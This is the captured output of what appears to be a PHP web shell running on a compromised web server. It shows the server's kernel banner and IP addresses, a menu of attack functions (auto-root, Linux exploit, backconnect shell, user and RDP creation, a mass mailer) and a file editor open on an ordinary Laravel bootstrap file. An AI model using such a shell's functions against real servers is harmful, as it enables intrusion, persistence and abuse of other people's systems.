Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.69
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signalhguniversity.com /
bootstrap /
[ HOME SHELL ]
Name
Size
Permission
Action
cache
[ DIR ]
drwxrwxrwx
app.php
1.05
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : app.php
<?php use Illuminate\Foundation\Application; use Illuminate\Foundation\Configuration\Exceptions; use Illuminate\Foundation\Configuration\Middleware; use Illuminate\Support\Facades\Route; use Spatie\Permission\Middleware\RoleMiddleware; return Application::configure(basePath: dirname(__DIR__)) ->withRouting( web: __DIR__.'/../routes/web.php', api: __DIR__.'/../routes/api.php', commands: __DIR__.'/../routes/console.php', then: function () { Route::middleware('web') ->group(base_path('routes/teaching.php')); }, ) ->withMiddleware(function (Middleware $middleware) { $middleware->trustProxies(at: '*'); $middleware->validateCsrfTokens(except: [ 'api/chatbot', ]); $middleware->web(append: [ \App\Http\Middleware\EnsureInstalled::class, ]); $middleware->alias([ 'role' => RoleMiddleware::class, ]); }) ->withExceptions(function (Exceptions $exceptions) { // }) ->create();
Close